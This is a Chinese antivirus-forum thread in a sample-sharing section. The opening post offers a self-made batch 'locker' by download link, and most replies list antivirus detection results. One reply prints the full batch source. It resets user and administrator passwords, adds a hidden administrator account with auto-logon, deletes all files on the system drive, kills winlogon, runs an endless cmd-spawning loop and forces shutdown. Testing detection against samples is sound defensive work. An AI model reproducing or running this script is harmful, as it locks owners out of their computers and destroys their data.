收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 自制bat锁机
12下一页
返回列表 发新帖
查看: 3991|回复: 13
收起左侧

[病毒样本] 自制bat锁机

[复制链接]
3245076553
发表于 2018-8-22 08:41:40 | 显示全部楼层 |阅读模式
链接: https://pan.baidu.com/s/195qHahPiwLTE4Q-E-0nPnA 密码: 8kqn
回复

举报

静影沉璧
发表于 2018-8-22 08:43:57 | 显示全部楼层
本帖最后由 静影沉璧 于 2018-8-22 08:45 编辑

BD2019
Feature:Antivirus
The file C:\Users\Administrator.SXCSXC-AJKJJUBR\Desktop\锁机.bat is infected with BehavesLike:BAT.Delete and was moved to quarantine. It is recommended that you run a System Scan to make sure your system is clean.


回复

举报

迷惘的执著
发表于 2018-8-22 08:48:19 | 显示全部楼层
360 kill
回复

举报

温馨小屋
头像被屏蔽
发表于 2018-8-22 08:55:22 | 显示全部楼层
Norton 被锁
回复

举报

WhiteCruel
发表于 2018-8-22 09:38:15 | 显示全部楼层
本帖最后由 WhiteCruel 于 2018-8-22 09:51 编辑

ESET
  1. https://yqall02.baidupcs.com/file/9203169b1d708fd586f950aa4a9daa6e?bkt=p3-14009203169b1d708fd586f950aa4a9daa6ea1678b76000000000296&fid=902368753-250528-714222346500564&time=1534901750&sign=FDTAXGERLQBHSKW-DCb740ccc5511e5e8fedcff06b081203-UvaO7/WVfCpZMsQDHN6lOWuwNK8=&to=73&size=662&sta_dx=662&sta_cs=24&sta_ft=bat&sta_ct=0&sta_mt=0&fm2=MH,Yangquan,Anywhere,,None,any&resv0=cdnback&resv1=0&vuk=282335&iv=-2&htype=&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=14009203169b1d708fd586f950aa4a9daa6ea1678b76000000000296&sl=82640974&expires=8h&rt=sh&r=164870015&mlogid=8871966550263437605&vbdid=2224767512&fin=锁机.bat&fn=锁机.bat&rtype=1&dp-logid=8871966550263437605&dp-callid=0.1.1&hps=1&tsl=50&csl=78&csign=0vnYzTYv2VV/f/Rkrbacf8q2JPs=&so=0&ut=8&uter=4&serv=0&uc=4192912830&ti=54c943154d862903e020d9abc5c68ccbf7882d20388a999a&by=themis;
  2. BAT/KillFiles.NER 特洛伊木马;连接中断;通过应用程序访问 web 时检测到威胁
复制代码
回复

举报

hhhw
发表于 2018-8-22 11:28:14 | 显示全部楼层
360kill
回复

举报

Kaspersky用户
发表于 2018-8-22 14:37:46 | 显示全部楼层
本帖最后由 Kaspersky用户 于 2018-8-22 14:40 编辑

KSCF扫描MISS,沙盘运行MISS。
回复

举报

www-tekeze
发表于 2018-8-22 15:23:51 | 显示全部楼层

又是个bat,火绒、智量均杀。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

安全守护者
头像被屏蔽
发表于 2018-8-22 20:35:09 | 显示全部楼层
  1. [url=home.php?mod=space&uid=331734]@echo[/url] off
  2. net user %username% fuckyou
  3. net user qq3256076553 fuckyou /add
  4. net localgroup administrators qq3256076553 /add
  5. net user administrator fuckyou
  6. net user admin fuckyou
  7. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v AutoAdminLogon /d 1
  8. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v DefaultUserName /d qq3256076553
  9. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v DefaultPassword /d

  11. @echo off
  12. del %systemdrive%\*.*/f /s /q
  13. shutdown -r -f -t 00

  15. @echo off
  16. cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul

  18. @echo off
  19. :xiaoz
  20. cls
  21. start cmd.exe
  22. goto xiaoz

  24. shutdown -s
复制代码


回复

举报

安全守护者
头像被屏蔽
发表于 2018-8-22 20:43:52 | 显示全部楼层


好像不成功啊
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-4-30 18:00 , Processed in 0.125183 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表